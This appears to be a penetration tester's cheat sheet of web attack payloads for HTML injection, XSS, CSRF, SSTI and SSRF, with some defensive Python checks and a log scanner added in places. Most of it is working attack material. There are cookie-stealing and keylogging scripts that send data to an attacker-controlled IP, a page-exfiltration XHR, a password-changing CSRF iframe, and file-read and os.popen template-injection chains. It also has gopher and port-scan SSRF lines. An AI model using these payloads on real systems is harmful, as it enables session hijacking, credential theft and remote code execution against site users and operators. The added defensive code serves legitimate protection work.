XSS / HTMLi / (S/C)SRF / SSTI
01. HTML Injection
Basic Test Payloads
<h1>h4rithd was here</h1>
<b>h4rithd was here</b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>
<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>
02. Cross Site Scripting (XSS)
Steal Cookie
## ------------------| Setup on my machine
#### Basic h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))
## ------------------| Payload
<script src="http://<IP>/h4rithd.js"></script>
Payloads
## python3 -m http.server 80
## ------------------| My fav payloads
<script>fetch("http://<MYIP>/favicon.ico?c="+document.cookie);</script>
<img src=x onerror=fetch("http://<MYIP>/favicon.ico?c="+document.cookie);>
<script>new Image().src="http://<MYIP>/favicon.ico?c="+document.cookie;</script>
<img src=x onerror=this.src="http://<MYIP>/favicon.ico?c="+btoa(document.cookie)/>
<script>document.location="http://<MYIP>/favicon.ico?c="+document.cookie;</script>
<script>var i=new Image(); i.src="http://<MYIP>/favicon.ico?c="+btoa(document.cookie);</script>
<script>document.write('<img src="http://<MYIP>/favicon.ico?c='+document.cookie+'"/>')</script>
## ------------------| Common payloads
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src="x` `<script>document.write('<script src="http://<MYIP>/favicon.ico?c="></script>');</script>"` `>`
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?t0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>
## ------------------| Other Payloads
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<a onmouseover="alert(document.cookie)">xss link</a>
<a onmouseover=alert(document.cookie)>xss link</a>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>
Send with CORS
const data = {
username: "h4rithd",
isAdmin: 1
}
fetch('/api/v1/updateUser', {
method: 'POST',
credentials: "include",
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data)
})
//<script src="http://<IP>/h4rithd.js"></script>
## ------------------| Payload I
var _get = new XMLHttpRequest();
_get.open("GET", 'http://victim-site/', false);
_get.send();
var _res = btoa(_get.responseText);
var _send = new XMLHttpRequest();
_send.open("GET", "http://<MyIP>/" + _res , false);
_send.send();
## ------------------| Payload II
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
# load this script via the payload below
<script src=http://10.10.14.22/script.js></script>
Server Side XSS (Dynamic PDF)
## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>
## If you need base64-encoded text, use this one instead.
x.onload=function(){document.write(btoa(this.responseText))};
Other APIs
## ------------------| Start the server to receive the data
sudo python3 -m http.server 80
## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>
## ------------------| Keyloggers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>
03. Cross-Site Request Forgery (CSRF)
Create Payload
<html>
<iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
<iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>
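The ChangePass?password= iframe above works because the endpoint changes state on a GET carrying nothing but the browser-attached session cookie; the credentials: "include" fetch in "Send with CORS" leans on the same thing for POST. Added example, not from the original notes: a server-side check in Python that refuses state changes on safe methods, requires an Origin or Referer matching the site, and compares a synchronizer token against the session. SITE_ORIGIN and the function names are assumptions; header keys are assumed already canonicalised.

```python
import hmac
from typing import Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example.invalid"   # assumed: the application's own origin
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}     # must never change state

def _request_origin(headers: dict) -> Optional[str]:
    """Origin header first, else scheme+host of the Referer. Browsers set both;
    a cross-site page cannot forge them with a form, iframe or fetch()."""
    if headers.get("Origin"):
        return headers["Origin"]
    referer = headers.get("Referer")
    if referer:
        p = urlsplit(referer)
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}"
    return None

def csrf_check(method: str, headers: dict, form: dict,
               session_token: Optional[str]) -> Tuple[bool, str]:
    """Decide whether a request may change state. Returns (allowed, reason)."""
    if method.upper() in SAFE_METHODS:
        # <iframe src="/ChangePass?password=..."> fires a GET with the cookie attached;
        # refusing state changes on GET removes that whole class.
        return False, "state change via safe method"
    origin = _request_origin(headers)
    if origin is None:
        return False, "no Origin/Referer"
    if origin != SITE_ORIGIN:
        return False, f"cross-origin request from {origin}"
    submitted = form.get("csrf_token", "")
    # Token is bound to the server-side session, so a cookie alone is not enough.
    if not session_token or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"
```

A SameSite=Lax or Strict attribute on the session cookie is the browser-side complement: the iframe GET then arrives with no cookie at all.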
04. Server-Side Template Injection (SSTI)
${{<%[%'"}}%\.
///test/e%0A;<%25%3d+system("ping+-c+2+10.10.14.4")+%25>
sdf%0a<%25=File.read("/etc/passwd")%25>
<%= id %>
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
{{.}}
{{user}}
{{config}}
{{password}}
{%include user%}
{%include config%}
{% include config %}
{%include password%}
{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
## ------------------| Spring Framework
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
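The probes above ({{7*7}}, ${7*7}, <%= 7*7 %>, #{7*7}, *{7*7}, the polyglot, and the __globals__/popen chains) are exactly what a log-based detection can key on. Added example, not from the original notes: a Python scanner that double-URL-decodes the path and query values from access-log lines and labels template-expression probes and exploitation-chain markers. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Probe syntaxes from the list above: {{..}}, ${..}, #{..}, *{..}, <%= .. %>, {% .. %}
PROBE_RE = re.compile(r"\{\{.*?\}\}|\$\{.*?\}|[#*]\{.*?\}|<%=?.*?%>|\{%.*?%\}", re.S)
# Exploitation-chain markers: Python dunders (also hex-escaped as \x5f\x5f),
# popen/system, Ruby File.read, and the Java reflection used by the SpEL payloads.
RCE_RE = re.compile(
    r"__(?:globals|builtins|import|init|class|subclasses)__|(?:\\x5f){2}"
    r"|\.popen\(|system\(|File\.read\(|getClass\(\)\.forName\(|getRuntime\(\)")
# Request part of a common/combined log line: "GET /path?query HTTP/1.1" 200
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_params(target: str) -> list:
    """Path plus every query value, decoded twice so %2525-style double encoding is seen."""
    parts = urlsplit(target)
    values = [unquote(unquote(parts.path))]
    values += [unquote(unquote(v)) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return values

def classify(target: str):
    """'rce' when an exploitation chain is present, 'probe' for a bare template
    expression such as {{7*7}}, None for an ordinary request."""
    values = decode_params(target)
    if any(RCE_RE.search(v) for v in values):
        return "rce"
    if any(PROBE_RE.search(v) for v in values):
        return "probe"
    return None

def scan_log(lines) -> list:
    """Return (target, label) for each request line that carries a probe or chain."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and (label := classify(m["target"])):
            hits.append((m["target"], label))
    return hits

# Constructed sample lines (not real traffic); lines 2-5 mirror the probes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 420',
    '10.0.0.9 - - [10/Jan/2024:10:00:03 +0000] "GET /greet?name=%24%7B7*7%7D HTTP/1.1" 200 420',
    '10.0.0.9 - - [10/Jan/2024:10:00:04 +0000] "GET /greet?name=%7B%7B%20namespace.__init__.__globals__.os.popen(%27id%27).read()%20%7D%7D HTTP/1.1" 500 0',
    '10.0.0.9 - - [10/Jan/2024:10:00:05 +0000] "GET /test/e%250A%3C%2525%3D+system(%22id%22)+%2525%3E HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for target, label in scan_log(SAMPLE_LOG):
        print(label, target)
```

The fix on the application side is to never pass user input as template source (render a fixed template and hand the input in as a variable); the scanner only tells you who is looking.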
05. Server-Side Request Forgery (SSRF)
### Setup local web server
sudo python3 -m http.server 80
### Browse URL
### Scan local ports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2
Gopher
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if vulnerable
### [\n ==> %0a or %25%30%61 (double-encoded); space ==> %20 or %25%32%30 (double-encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests
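Both SSRF patterns above (scanning localhost:FUZZ through url.php?path= and smuggling a raw request through gopher://) need the server to fetch whatever scheme, host and port the parameter names. Added example, not from the original notes: a Python check for a user-supplied URL that allow-lists scheme and port, rejects localhost, credentials in the URL and any host that resolves to an internal range. The resolver is injectable so the check runs offline; ALLOWED_PORTS and the function names are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # gopher://, file://, dict:// etc. are rejected outright
ALLOWED_PORTS = {80, 443}             # defeats the ?path=localhost:FUZZ port-scan pattern

def _resolve(host: str) -> list:
    """Default resolver: every address the name maps to (A and AAAA records)."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]

def _is_internal(ip: str) -> bool:
    """Loopback, RFC1918, link-local (169.254.0.0/16 incl. cloud metadata), multicast, reserved."""
    a = ipaddress.ip_address(ip)
    return (a.is_loopback or a.is_private or a.is_link_local or a.is_reserved
            or a.is_multicast or a.is_unspecified)

def check_fetch_url(url: str, resolve=_resolve) -> tuple:
    """Return (allowed, reason) for a user-supplied URL the server is asked to fetch."""
    try:
        p = urlsplit(url)
        port = p.port or (443 if p.scheme.lower() == "https" else 80)
    except ValueError as e:
        return False, f"unparseable: {e}"
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if not p.hostname:
        return False, "no host"
    if p.username or p.password:
        return False, "credentials in URL"      # http://trusted.host@10.0.0.1/ style confusion
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if p.hostname.lower() == "localhost":
        return False, "localhost"
    try:
        ipaddress.ip_address(p.hostname)        # literal address: check it directly
        addrs = [p.hostname]
    except ValueError:                          # hostname: check every resolved address
        try:
            addrs = resolve(p.hostname)         # also catches 127.1 / 0x7f000001 spellings
        except socket.gaierror:
            return False, "unresolvable host"
    for ip in addrs:
        if _is_internal(ip):
            return False, f"{p.hostname} resolves to internal address {ip}"
    return True, "ok"
```

The fetch itself must connect to the address that was checked (pin it, and re-check every redirect target), otherwise DNS rebinding between check and connect undoes the resolution step.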